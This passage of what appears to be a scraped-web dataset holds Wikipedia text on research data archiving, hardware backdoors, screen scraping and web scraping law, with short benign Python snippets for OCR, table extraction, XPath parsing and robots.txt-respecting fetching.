Another effective preventive measure is the use of offshore backup facilities that would not be affected should a disaster occur. From these backup servers, copies of the lost data could easily be retrieved. A multi-site and multi-technique data distribution plan is advised for optimal data recovery, especially when dealing with big data. TCP/IP transfer, snapshot recovery, mirror sites and tapes safeguarding data in a private cloud are also all good preventive methods, as is transferring data daily from mirror sites to emergency servers. 6 |
275 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_library | Research data archiving is the long-term storage of scholarly research data, including the natural sciences, social sciences, and life sciences. The various academic journals have differing policies regarding how much of their data and methods researchers are required to store in a public archive, and what is actually archived varies widely between different disciplines. Similarly, the major grant-giving institutions have varying attitudes towards public archiving of data. In general, the tradition of science has been for publications to contain sufficient information to allow fellow researchers to replicate and therefore test the research. In recent years this approach has become increasingly strained as research in some areas depends on large datasets which cannot easily be replicated independently. Data archiving is more important in some fields than others. In a few fields, all of the data necessary to replicate the work is already available in the journal article. In drug development, a great deal of data is generated and must be archived so researchers can verify that the reports the drug companies publish accurately reflect the data. The requirement of data archiving is a recent development in the history of science. It was made possible by advances in information technology allowing large amounts of data to be stored and accessed from central locations. For example, the American Geophysical Union (AGU) adopted their first policy on data archiving in 1993, about three years after the beginning of the WWW. 1 This policy mandates that datasets cited in AGU papers must be archived by a recognised data center; it permits the creation of "data papers"; and it establishes AGU's role in maintaining data archives. But it makes no requirements on paper authors to archive their data. Prior to organized data archiving, researchers wanting to evaluate or replicate a paper would have to request data and methods information from the author. The academic community expects authors to share supplemental data. This process was recognized as wasteful of time and energy and obtained mixed results. Information could become lost or corrupted over the years. In some cases, authors simply refuse to provide the information. The need for data archiving and due diligence is greatly increased when the research deals with health issues or public policy formation. 2 3 Biotropica requires, as a condition for publication, that the data supporting the results in the paper and metadata describing them must be archived in an appropriate public archive such as Dryad, Figshare, GenBank, TreeBASE, or NCBI. Authors may elect to make the data publicly available as soon as the article is published or, if the technology of the archive allows, embargo access to the data up to three years after article publication. A statement describing Data Availability will be included in the manuscript as described in the instructions to authors. Exceptions to the required archiving of data may be granted at the discretion of the Editor-in-Chief for studies that include sensitive information (e.g., the location of endangered species). Our Editorial explaining the motivation for this policy can be found here. A more comprehensive list of data repositories is available here. 
Promoting a culture of collaboration with researchers who collect and archive data: The data collected by tropical biologists are often long-term, complex, and expensive to collect. The Board of Editors of Biotropica strongly encourages authors who re-use data archives archived data sets to include as fully engaged collaborators the scientists who originally collected them. We feel this will greatly enhance the quality and impact of the resulting research by drawing on the data collector’s profound insights into the natural history of the study system, reducing the risk of errors in novel analyses, and stimulating the cross-disciplinary and cross-cultural collaboration and training for which the ATBC and Biotropica are widely recognized. NB: Biotropica is one of only two journals that pays the fees for authors depositing data at Dryad. The American Naturalist requires authors to deposit the data associated with accepted papers in a public archive. For gene sequence data and phylogenetic trees, deposition in GenBank or TreeBASE, respectively, is required. There are many possible archives that may suit a particular data set, including the Dryad repository for ecological and evolutionary biology data. All accession numbers for GenBank, TreeBASE, and Dryad must be included in accepted manuscripts before they go to Production. If the data is deposited somewhere else, please provide a link. If the data is culled from published literature, please deposit the collated data in Dryad for the convenience of your readers. Any impediments to data sharing should be brought to the attention of the editors at the time of submission so that appropriate arrangements can be worked out. 4 The primary data underlying the conclusions of an article are critical to the verifiability and transparency of the scientific enterprise, and should be preserved in usable form for decades in the future. For this reason, Journal of Heredity requires that newly reported nucleotide or amino acid sequences, and structural coordinates, be submitted to appropriate public databases (e.g., GenBank; the EMBL Nucleotide Sequence Database; DNA Database of Japan; the Protein Data Bank; and Swiss-Prot). Accession numbers must be included in the final version of the manuscript. For other forms of data (e.g., microsatellite genotypes, linkage maps, images), the Journal endorses the principles of the Joint Data Archiving Policy (JDAP) in encouraging all authors to archive primary datasets in an appropriate public archive, such as Dryad, TreeBASE, or the Knowledge Network for Biocomplexity. Authors are encouraged to make data publicly available at time of publication or, if the technology of the archive allows, opt to embargo access to the data for a period up to a year after publication. The American Genetic Association also recognizes the vast investment of individual researchers in generating and curating large datasets. Consequently, we recommend that this investment be respected in secondary analyses or meta-analyses in a gracious collaborative spirit. Molecular Ecology expects that data supporting the results in the paper should be archived in an appropriate public archive, such as GenBank, Gene Expression Omnibus, TreeBASE, Dryad, the Knowledge Network for Biocomplexity, your own institutional or funder repository, or as Supporting Information on the Molecular Ecology web site. Data are important products of the scientific enterprise, and they should be preserved and usable for decades in the future. 
Authors may elect to have the data publicly available at time of publication, or, if the technology of the archive allows, may opt to embargo access to the data for a period up to a year after publication. Exceptions may be granted at the discretion of the editor, especially for sensitive information such as human subject data or the location of endangered species. Such material must be hosted on an accredited independent site (URL and accession numbers to be provided by the author), or sent to the Nature journal at submission, either uploaded via the journal's online submission service, or if the files are too large or in an unsuitable format for this purpose, on CD DVD (five copies). Such material cannot solely be hosted on an author's personal or institutional web site. 7 Nature requires the reviewer to determine if all of the supplementary data and methods have been archived. The policy advises reviewers to consider several questions, including: "Should the authors be asked to provide supplementary methods or data to accompany the paper online? (Such data might include source code for modelling studies, detailed experimental protocols or mathematical derivations.) Science supports the efforts of databases that aggregate published data for the use of the scientific community. Therefore, before publication, large data sets (including microarray data, protein or DNA sequences, and atomic coordinates or electron microscopy maps for macromolecular structures) must be deposited in an approved database and an accession number provided for inclusion in the published paper. 9 "Materials and methods" Science now requests that, in general, authors place the bulk of their description of materials and methods online as supporting material, providing only as much methods description in the print manuscript as is necessary to follow the logic of the text. (Obviously, this restriction will not apply if the paper is fundamentally a study of a new method or technique.) To allow others to verify and build on the work published in Royal Society journals, it is a condition of publication that authors make available the data, code and research materials supporting the results in the article. Datasets and code should be deposited in an appropriate, recognised, publicly available repository. Where no data-specific repository exists, authors should deposit their datasets in a general repository such as Dryad (repository) or Figshare. The Journal of Archaeological Science has had a data disclosure policy since at least 2013. Their policy states that 'all data relating to the article must be made available in Supplementary files or deposited in external repositories and linked to within the article. The policy recommends that data are deposited in a repository such as the Archaeology Data Service, the Digital Archaeological Record, or PANGAEA. A 2018 study found a data availability rate of 53%, reflecting either weak enforcement of this policy or an incomplete understanding among editors, reviewers, and authors of how to interpret and implement this policy. 12 In the United States, the National Science Foundation (NSF) has tightened requirements on data archiving. Researchers seeking funding from NSF are now required to file a data management plan as a two-page supplement to the grant application. 
13 The NSF Datanet initiative has resulted in funding of the Data Observation Network for Earth (DataONE) project, which will provide scientific data archiving for ecological and environmental data produced by scientists worldwide. DataONE's stated goal is to preserve and provide access to multi-scale, multi-discipline, and multi-national data. The community of users for DataONE includes scientists, ecosystem managers, policy makers, students, educators, and the public. The German DFG requires that research data should be archived in the researcher's own institution or an appropriate nationwide infrastructure for at least 10 years. 14 The British Digital Curation Centre maintains an overview of funder's data policies. 15 Research data is archived in data libraries or data archives. A data library, data archive, or data repository is a collection of numeric and or geospatial data sets for secondary use in research. A data library is normally part of a larger institution (academic, corporate, scientific, medical, governmental, etc.). established for research data archiving and to serve the data users of that organisation. The data library tends to house local data collections and provides access to them through various means (CD DVD-ROMs or central server for download). A data library may also maintain subscriptions to licensed data resources for its users to access the information. Whether a data library is also considered a data archive may depend on the extent of unique holdings in the collection, whether long-term preservation services are offered, and whether it serves a broader community (as national data archives do). Most public data libraries are listed in the Registry of Research Data Repositories. In August 2001, the Association of Research Libraries (ARL) published a report 16 presenting results from a survey of ARL member institutions involved in collecting and providing services for numeric data resources. Library service providing support at the institutional level for the use of numerical and other types of datasets in research. Amongst the support activities typically available: The following list refers to scientific data archives. In the social sciences, data libraries are referred to as data archives. 17 Data archives are professional institutions for the acquisition, preparation, preservation, and dissemination of social and behavioral data. Data archives in the social sciences evolved in the 1950s and have been perceived as an international movement: By 1964 the International Social Science Council (ISSC) had sponsored a second conference on Social Science Data Archives and had a standing Committee on Social Science Data, both of which stimulated the data archives movement. By the beginning of the twenty-first century, most developed countries and some developing countries had organized formal and well-functioning national data archives. In addition, college and university campuses often have data libraries' that make data available to their faculty, staff, and students; most of these bear minimal archival responsibility, relying for that function on a national institution (Rockwell, 2001, p. 3227). 18 |
276 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Hardware_backdoor | Hardware backdoors are backdoors in hardware, such as code inside hardware or firmware of computer chips. 1 The backdoors may be directly implemented as hardware Trojans in the integrated circuit. Hardware backdoors are intended to undermine security in smartcards and other cryptoprocessors unless investment is made in anti-backdoor design methods. 2 They have also been considered for car hacking. 3 Hardware backdoors are considered to be highly problematic for several reasons. 1 For instance, they cannot be removed by conventional means such as antivirus software. They can also circumvent other types of security, such as disk encryption. Lastly, they can also be injected during production where the user has no control. Skorobogatov has developed a technique capable of detecting malicious insertions into chips. 9 New York University Tandon School of Engineering researchers have developed a way to corroborate a chip's operation using verifiable computing whereby "manufactured for sale" chips contain an embedded verification module that proves the chip's calculations are correct and an associated external module validates the embedded verification module. 8 Another technique developed by researchers at University College London (UCL) relies on distributing trust between multiple identical chips from disjoint supply chains. Assuming that at least one of those chips remains honest the security of the device is preserved. 20 Researchers at the University of Southern California Ming Hsieh Department of Electrical and Computer Engineering and the Photonic Science Division at the Paul Scherrer Institute have developed a new technique called Ptychographic X-ray laminography. 21 This technique is the only current method that allows for verification of the chips blueprint and design without destroying or cutting the chip. It also does so in significantly less time than other current methods. Anthony F. J. Levi Professor of electrical and computer engineering at University of Southern California explains “It’s the only approach to non-destructive reverse engineering of electronic chips— and not just reverse engineering but assurance that chips are manufactured according to design. You can identify the foundry, aspects of the design, who did the design. It’s like a fingerprint. 21 This method currently is able to scan chips in 3D and zoom in on sections and can accommodate chips up to 12 millimeters by 12 millimeters easily accommodating an Apple A12 chip but not yet able to scan a full Nvidia Volta GPU. 21 "Future versions of the laminography technique could reach a resolution of just 2 nanometers or reduce the time for a low-resolution inspection of that 300 by 300 micrometer segment to less than an hour, the researchers say. 21 |
277 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Screen_scraping | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
Computer-to-user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today, for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50-year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24×80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally, Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX/VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined, in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 
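The OCR-based screen scraping mentioned above can be sketched in a few lines of Python. The sketch assumes the third-party Pillow and pytesseract packages (plus a local Tesseract install) and a hypothetical screenshot file; it illustrates the idea rather than providing a production screen scraper.

from PIL import Image          # pip install pillow
import pytesseract             # pip install pytesseract (requires the Tesseract binary)

# Load a captured screen image (the path is a placeholder) and run it through OCR.
screen = Image.open("legacy_terminal_capture.png")
text = pytesseract.image_to_string(screen)

# Keep the lines that look like data rows rather than screen furniture.
rows = [line for line in text.splitlines() if line.strip() and not line.startswith("---")]
print(rows)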
7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
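Report mining, as described in the record above, can often be done with nothing more than regular expressions over a spooled text report. The sketch below parses a made-up, fixed-format sales report into structured rows using Python's re module; the report layout and field names are assumptions for illustration only.

import re

# A small, invented example of a human-readable spool file.
report = """
DAILY SALES REPORT                         PAGE 1
ITEM        QTY     PRICE
Widget       12     19.99
Gadget        3      4.50
"""

# One pattern per data row: item name, integer quantity, decimal price.
row_pattern = re.compile(r"^(\w+)\s+(\d+)\s+(\d+\.\d{2})\s*$", re.MULTILINE)

records = [
    {"item": item, "qty": int(qty), "price": float(price)}
    for item, qty, price in row_pattern.findall(report)
]
print(records)   # [{'item': 'Widget', 'qty': 12, 'price': 19.99}, ...]

Because the input is a static file rather than a live system, this kind of extraction can run offline, which is exactly the advantage the report-mining discussion highlights.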
278 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-29 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
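The fetch, extract, and copy-into-a-spreadsheet workflow described in the record above can be sketched with the libraries already imported at the top of this notebook (pandas and StringIO). The HTML snippet below is invented so the example runs without a network connection; in a live run the string would come from an HTTP GET instead.

from io import StringIO
import pandas as pd

# Fetching: in a live run this would be, for example,
#   html = requests.get("https://en.wikipedia.org/wiki/Web_scraping", timeout=10).text
# A tiny inline page with one table keeps the sketch self-contained.
html = """
<table>
  <tr><th>Company</th><th>URL</th></tr>
  <tr><td>Example Ltd</td><td>https://example.com</td></tr>
  <tr><td>Sample Inc</td><td>https://example.org</td></tr>
</table>
"""

# Extraction: pandas parses every <table> in the document into a DataFrame.
tables = pd.read_html(StringIO(html))
contacts = tables[0]

# Loading: copy the extracted data into a spreadsheet-friendly CSV file.
contacts.to_csv("contacts.csv", index=False)
print(contacts)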
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
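Both the grep-style approach and the DOM-tree approach described in the record above can be illustrated briefly in Python. The regular-expression line uses only the standard library; the XPath lines assume the third-party lxml package. The HTML snippet is invented for the example.

import re
from lxml import html   # pip install lxml

page = '<html><body><a href="/a">First</a> <a href="/b">Second</a></body></html>'

# grep-style: a regular expression pulls out every href attribute.
print(re.findall(r'href="([^"]+)"', page))           # ['/a', '/b']

# DOM-style: parse the page into a tree and query it with XPath.
tree = html.fromstring(page)
print(tree.xpath("//a/@href"))                        # ['/a', '/b']
print(tree.xpath("//a/text()"))                       # ['First', 'Second']

Regular expressions are quick for flat, predictable markup, while the DOM/XPath route copes better with nesting and attribute variations, which is why both appear in the text.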
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
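The anti-bot measures this record alludes to are easier to respect than to fight. Below is a minimal, hedged sketch of a "polite" fetcher in Python: it checks robots.txt with the standard-library urllib.robotparser, identifies itself with a User-Agent header, and rate-limits its requests. The user-agent string, delay, and target path are placeholders, not recommendations.

import time
from urllib import robotparser

import requests

BASE = "https://en.wikipedia.org"
USER_AGENT = "example-research-bot/0.1 (contact: you@example.com)"  # placeholder identity

# Read the site's robots.txt once and reuse the parser for every URL.
robots = robotparser.RobotFileParser(BASE + "/robots.txt")
robots.read()

def polite_get(path, delay=2.0):
    """Fetch a path only if robots.txt allows it, then pause before returning."""
    url = BASE + path
    if not robots.can_fetch(USER_AGENT, url):
        print("Skipping (disallowed by robots.txt):", url)
        return None
    response = requests.get(url, headers={"User-Agent": USER_AGENT}, timeout=10)
    time.sleep(delay)          # crude rate limit so the scraper does not hammer the server
    return response

page = polite_get("/wiki/Web_scraping")
if page is not None:
    print(page.status_code, len(page.text), "characters")

Respecting robots.txt and throttling requests addresses the "increased system load" objection mentioned earlier in this document and reduces the chance of triggering the defensive blocking that the legal cases above revolve around.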
